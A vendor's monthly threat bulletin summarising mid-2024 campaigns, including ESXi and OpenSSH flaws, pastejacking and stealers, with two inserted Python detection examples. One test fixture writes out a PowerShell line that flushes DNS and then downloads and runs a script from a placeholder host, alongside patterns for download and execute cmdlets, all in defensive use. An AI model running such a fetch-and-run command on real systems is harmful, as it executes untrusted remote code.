Threat Pulse – July 2024
Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats.
If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.
DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the largest Open Threat Exchange database available.
North Korea-Linked Malware Targets Developers
A North Korea-linked malware campaign, dubbed DEV#POPPER, is targeting software developers across Windows, Linux, and macOS systems.
This sophisticated attack uses social engineering tactics, posing as job interviewers to trick victims into downloading malicious software from GitHub. The malware, including updated versions like BeaverTail and the Python-based InvisibleFerret, exfiltrates sensitive data, accesses cookies, executes commands, and logs keystrokes.
Enhanced obfuscation, AnyDesk software for persistence, and robust data exfiltration mechanisms are notable features of this ongoing threat.
SideWinder Cyber Attacks Target Maritime Facilities
The SideWinder threat actor, affiliated with India, has launched a new cyber espionage campaign targeting maritime facilities in the Indian Ocean and Mediterranean Sea.
Using spear-phishing techniques with lures related to sexual harassment and employee termination, the attackers exploit known Microsoft Office vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to deploy malicious payloads.
This campaign affects countries like Pakistan, Egypt, and Sri Lanka, aiming for intelligence gathering. The ongoing evolution of SideWinder’s tactics indicates continued attacks in the future.
VMware ESXi Flaw Exploited by Ransomware Groups
Ransomware groups are exploiting a recently patched security flaw in VMware ESXi hypervisors, identified as CVE-2024-37085, to gain administrative access and deploy ransomware such as Akira and Black Basta.
The vulnerability allows attackers to bypass Active Directory authentication, elevating privileges by recreating or renaming the “ESX Admins” group.
Threat actors including Storm-0506 and Storm-1175 leverage this flaw for data exfiltration and lateral movement within compromised networks, highlighting the need for immediate patching and enhanced security measures.
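As an added example (not DigitalXRAID's or VMware's code), a Python triage routine for the Active Directory side of this flaw: it scans Windows Security audit events for a group being created as, renamed to, or gaining unapproved members in "ESX Admins". Assumptions: the standard group-management audit event IDs (4727, 4728, 4781) and their field names; the member allow-list and sample events are constructed.

```python
from dataclasses import dataclass
from typing import Dict, List

# Windows Security event IDs on the "ESX Admins" abuse path:
#   4727 = security-enabled global group created
#   4728 = member added to a security-enabled global group
#   4781 = the name of an account (here, a group) was changed
GROUP_CREATED, MEMBER_ADDED, ACCOUNT_RENAMED = 4727, 4728, 4781
TARGET_GROUP = "esx admins"  # compared case-insensitively, whitespace trimmed

# Hypothetical allow-list of accounts that are legitimately ESXi administrators.
APPROVED_MEMBERS = {"CORP\\vsphere-admin"}

@dataclass
class Alert:
    event_id: int
    reason: str
    actor: str

def _norm(name: str) -> str:
    return name.strip().lower()

def triage_events(events: List[Dict]) -> List[Alert]:
    """Alert on events that create, rename to, or add unapproved members to 'ESX Admins'."""
    alerts = []
    for ev in events:
        eid, actor = ev["EventID"], ev.get("SubjectUserName", "?")
        if eid == GROUP_CREATED and _norm(ev["TargetUserName"]) == TARGET_GROUP:
            alerts.append(Alert(eid, "group 'ESX Admins' created", actor))
        elif eid == ACCOUNT_RENAMED and _norm(ev["NewTargetUserName"]) == TARGET_GROUP:
            alerts.append(Alert(eid, f"'{ev['OldTargetUserName']}' renamed to 'ESX Admins'", actor))
        elif (eid == MEMBER_ADDED and _norm(ev["TargetUserName"]) == TARGET_GROUP
                and ev["MemberName"] not in APPROVED_MEMBERS):
            alerts.append(Alert(eid, f"unapproved member {ev['MemberName']} added", actor))
    return alerts

# Constructed sample events (not real logs). Field names follow the Windows events;
# real 4728 events carry the member's distinguished name, shortened here for readability.
SAMPLE_EVENTS = [
    {"EventID": 4727, "TargetUserName": "ESX Admins", "SubjectUserName": "CORP\\jdoe"},
    {"EventID": 4781, "OldTargetUserName": "Helpdesk", "NewTargetUserName": "esx admins",
     "SubjectUserName": "CORP\\jdoe"},
    {"EventID": 4728, "TargetUserName": "ESX Admins", "MemberName": "CORP\\jdoe",
     "SubjectUserName": "CORP\\jdoe"},
    {"EventID": 4728, "TargetUserName": "ESX Admins", "MemberName": "CORP\\vsphere-admin",
     "SubjectUserName": "CORP\\svc-ad"},
    {"EventID": 4727, "TargetUserName": "Printer Operators", "SubjectUserName": "CORP\\svc-ad"},
]

if __name__ == "__main__":
    for a in triage_events(SAMPLE_EVENTS):
        print(f"[{a.event_id}] {a.reason} (by {a.actor})")
```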
New OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk
A newly discovered vulnerability in OpenSSH, tracked as CVE-2024-6409, poses a potential remote code execution (RCE) risk.
This flaw, affecting versions 8.7p1 and 8.8p1 on Red Hat Enterprise Linux 9, is due to a race condition in signal handling within the privsep child process.
This vulnerability shares similarities with CVE-2024-6387 but impacts processes with reduced privileges. An active exploit for CVE-2024-6387 has been observed, emphasising the need for immediate mitigation.
Cybercriminals Exploit CrowdStrike Update Mishap to Spread Remcos RAT Malware
Cybercriminals are exploiting a recent CrowdStrike update mishap to distribute Remcos RAT malware.
Following an IT disruption caused by a flawed update, attackers are targeting CrowdStrike’s Latin American customers with a fake “crowdstrike-hotfix.zip” file. This file contains a malware loader that launches the Remcos RAT payload.
The phishing campaign uses Spanish instructions to deceive users into running the malicious executable. CrowdStrike advises affected customers to communicate through official channels and follow provided technical guidance.
Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers
A now-patched vulnerability in Microsoft Defender SmartScreen (CVE-2024-21412) has been exploited to distribute ACR Stealer, Lumma, and Meduza malware.
Fortinet FortiGuard Labs identified this campaign targeting Spain, Thailand, and the U.S., using booby-trapped files to bypass SmartScreen protection. Attackers trick users into downloading an LNK file, which then executes malicious payloads via an HTML Application script.
This vulnerability was addressed in Microsoft’s February 2024 update. Users should ensure their systems are updated and exercise caution when downloading files.
OneDrive Phishing Scam Tricks Users into Running Malicious PowerShell Script
Cybersecurity researchers have identified a new phishing campaign targeting Microsoft OneDrive users with a malicious PowerShell script, dubbed “OneDrive Pastejacking”.
This sophisticated attack employs social engineering tactics, tricking users into executing a PowerShell script under the guise of fixing a DNS error. The attack is initiated via an email containing an HTML file that mimics a OneDrive page, prompting users to run a Base64-encoded command in PowerShell. The command flushes the DNS cache, creates a directory, then downloads and executes a malicious script.
This campaign has targeted users in several countries, including the U.S., South Korea, and Germany. Similar phishing tactics have been reported, often involving bogus Windows shortcut files and Microsoft Office Forms to steal credentials.
Attackers exploit Secure Email Gateways (SEGs) by disguising malicious files, such as using ZIP archives with misleading headers to bypass detection. This underscores the evolving nature of phishing threats and the ongoing efforts by adversaries to evade security measures.
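As an added example (not code from DigitalXRAID or the researchers who reported the campaign), a Python detection that decodes the Base64 argument of PowerShell's -EncodedCommand from a process command line and scores the decoded script against the four stages described above. The stage patterns, the alert threshold and the sample command lines (including the placeholder URL) are constructed assumptions.

```python
import base64
import re
from typing import List, Optional, Tuple

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -en, -enc ...)
# followed by the base64 argument; -ExecutionPolicy / -ep do not match.
ENC_SWITCH = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")

# One pattern per stage of the chain the lure runs; matched against the decoded script.
INDICATORS = {
    "dns_flush": re.compile(r"(?i)ipconfig\s+/flushdns|Clear-DnsClientCache"),
    "mkdir": re.compile(r"(?i)New-Item\b.*-ItemType\s+Directory|\bmkdir\b"),
    "download": re.compile(r"(?i)Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient"),
    "execute": re.compile(r"(?i)Invoke-Expression|\biex\b|Start-Process"),
}
ALERT_THRESHOLD = 3  # three of four stages: tolerates variants, ignores a lone benign download

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text), or None."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: leave for other detections

def analyse(cmdline: str) -> Tuple[Optional[str], List[str]]:
    """Decode the command line and return (decoded_script, matched_stage_names)."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return None, []
    return decoded, [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def is_suspicious(cmdline: str) -> bool:
    return len(analyse(cmdline)[1]) >= ALERT_THRESHOLD

def encode_for_powershell(script: str) -> str:
    """Builds fixtures the way PowerShell expects its -EncodedCommand argument."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed command lines (not real campaign artefacts); the URL is a placeholder.
LURE_SCRIPT = ("ipconfig /flushdns; New-Item -ItemType Directory -Path $env:TEMP\\cache; "
               "iex (iwr 'https://example.invalid/PLACEHOLDER.ps1').Content")
BENIGN_SCRIPT = "Get-Date; Get-Service -Name Dnscache"
SAMPLE_CMDLINES = [
    "powershell.exe -enc " + encode_for_powershell(LURE_SCRIPT),
    "powershell.exe -NoProfile -EncodedCommand " + encode_for_powershell(BENIGN_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]
```

Run `analyse()` over Sysmon event 1 or Security event 4688 command lines; the decoded script is what analysts should review, since the Base64 form hides the stages from naive keyword matching.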
Meta Removes 63,000 Instagram Accounts Linked to Nigerian Sextortion Scams
Meta Platforms announced the removal of about 63,000 Instagram accounts in Nigeria involved in financial sextortion scams.
A coordinated network of around 2,500 accounts linked to 20 individuals primarily targeted adult men in the U.S. and, in some cases, minors; those cases were reported to the National Center for Missing and Exploited Children.
Additionally, Meta removed 7,200 assets, including Facebook accounts, pages, and groups used to train and recruit scammers.
This network, attributed to the cybercrime group Yahoo Boys, had previously targeted teenagers in Australia, Canada, and the U.S.
Meta has implemented new methods to detect sextortion activities. Meanwhile, INTERPOL’s global operation Jackal III led to 300 arrests and the seizure of $3 million in assets, targeting West African crime groups involved in various crimes, including cyber fraud.
Other international law enforcement actions included significant arrests and takedowns related to cybercrime and DDoS-for-hire services.
Telegram App Flaw Exploited to Spread Malware Hidden in Videos
A zero-day security flaw named EvilVideo in Telegram’s Android app allowed attackers to distribute malicious files disguised as harmless videos. The exploit, which appeared for sale on an underground forum on June 6, 2024, was addressed by Telegram on July 11 in version 10.14.5.
Attackers used Telegram’s API to camouflage malicious APK files as 30-second videos, tricking users into installing them by displaying a fake error message. The attack targeted Telegram’s mobile app for Android, but not its web or Windows clients.
The exploit’s reach and origins remain unclear, but similar tactics have been used by other cybercriminals, such as distributing fake Hamster Kombat apps to deploy malware.
Telegram implemented a server-side fix, while Google emphasized that Google Play Protect can safeguard users against such threats.
DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service mean we can take care of your security, whilst you take care of business.
Talk to the team to see how you can start protecting your business against cyberattacks today.